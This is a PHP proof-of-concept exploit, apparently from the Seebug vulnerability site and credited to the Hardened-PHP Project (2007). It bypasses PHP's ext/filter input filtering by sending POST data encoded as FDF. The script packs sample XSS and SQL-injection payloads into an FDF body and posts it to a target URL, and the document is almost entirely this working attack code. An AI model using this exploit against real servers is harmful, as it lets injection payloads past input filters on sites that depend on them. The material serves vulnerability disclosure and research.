<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ // // | __ |/ _` || \'_|/ _` |/ -_)| \' / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP ext/filtet FDF POST Filter Bybass Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die(\"REMOVE THIS LINE\"); // _POST is the array that will be sent to the url in $url $_POST = array(); $_POST[\'var1\'] = \"<script>alert(/XSS/);</script>\"; $_POST[\'var2\'] = \" \' UNION SELECT \"; $url = \"http://127.0.0.1/info.php\"; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, \"outtest.fdf\"); fdf_close($outfdf); $ret = file_get_contents(\"outtest.fdf\"); unlink(\"outtest.fdf\"); $params = array(\'http\' => array( \'method\' => \'POST\', \'content\' => $ret, \'header\' => \'Content-Type: application/vnd.fdf\' )); $ctx = stream_context_create($params); $fp = @fopen($url, \'rb\', false, $ctx); if (!$fp) { die(\"Cannot open $url\"); } $response = @stream_get_contents($fp); echo $response; echo \" \"; ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论